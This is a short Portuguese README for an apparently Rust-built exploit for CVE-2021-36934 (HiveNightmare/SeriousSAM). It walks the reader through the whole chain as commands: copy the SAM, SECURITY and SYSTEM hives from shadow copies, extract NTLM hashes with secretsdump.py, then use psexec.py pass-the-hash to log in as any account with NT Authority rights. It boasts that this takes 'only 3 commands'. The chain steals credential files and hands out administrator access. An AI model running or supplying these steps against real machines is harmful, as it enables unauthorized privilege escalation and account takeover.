
Exploit para CVE-2021-36934
Um exploit para a vulnerabilidade HiveNightmare/SeriousSAM que permite ler hive do registro contendo dados sensíveis sem privilégios de administrador. Se isso não parece escalação de privilégios, não sei o que é.
Após compilar o exploit com cargo build e obter o binário, implante-o no seu ambiente de teste, abra o CMD e execute .\oxide_hive [max shadow copies]; o padrão para cópias de sombra é 15. As hives SAM, SECURITY e SYSTEM devem ser extraídas para o diretório de trabalho.
A partir daí, você pode usar este script com o comando secretsdump.py -sam SAM.dump -security SECURITY.dump -system SYSTEM.dump local para recuperar os hashes NTLM.
Depois, você pode usar outro script com o comando psexec.py -hashes <hash da conta> <usuário>@<IP da máquina> cmd.exe para fazer login remotamente em qualquer conta. Parabéns, você acabou de passar de usuário sem privilégios para NT Authority com apenas 3 comandos.